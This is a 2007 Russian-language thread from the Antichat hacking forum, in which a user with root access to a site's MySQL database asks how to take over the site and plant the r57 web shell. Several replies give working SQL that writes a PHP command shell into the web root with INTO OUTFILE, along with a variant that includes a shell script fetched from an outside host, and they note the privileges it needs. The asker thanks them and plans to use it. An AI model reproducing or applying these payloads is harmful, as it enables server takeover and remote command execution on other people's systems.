ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

MySQL и root доступ
  #1  
Старый 15.07.2007, 14:49
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346

Репутация: -24
По умолчанию MySQL и root доступ

народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?
 

  #2  
Старый 15.07.2007, 15:06
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677

Репутация: 472
По умолчанию

все зависит от твоей цели, если нужен сайт, то залей шелл.
 

  #3  
Старый 15.07.2007, 15:06
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)
 

  #4  
Старый 15.07.2007, 15:33
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346

Репутация: -24
По умолчанию

народ вы меня видимо немножко не так поняли...
У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
есть какиенибудь мыслишки?
 

  #5  
Старый 15.07.2007, 15:40
Ni0x
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677

Репутация: 472
По умолчанию

используй
Цитата:
INTO OUTFILE

Последний раз редактировалось Ni0x; 15.07.2007 в 15:43..
 

  #6  
Старый 15.07.2007, 15:43
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162

Репутация: 156
По умолчанию

я понял что ему надо.
ему надо через бд залить шелл.
Ты говориш что нет скриптов какие работают с бд.
такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
Гдето на форуме писали что через команду мускула льёться шелл.
поиши что то типа Шелл через бд или в этом роде
 

  #7  
Старый 15.07.2007, 15:47
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';
 

  #8  
Старый 15.07.2007, 15:51
helat
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162

Репутация: 156
По умолчанию

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Вот был пример с пхп ББ
 

  #9  
Старый 15.07.2007, 15:56
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Это если filepriv включен =)
и есть права на запись в папку

Последний раз редактировалось ENFIX; 15.07.2007 в 15:58..
 

  #10  
Старый 15.07.2007, 16:49
Gargulia
Banned
Регистрация: 22.06.2007
Сообщений: 7
Провел на форуме:
19346

Репутация: -24
По умолчанию

всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ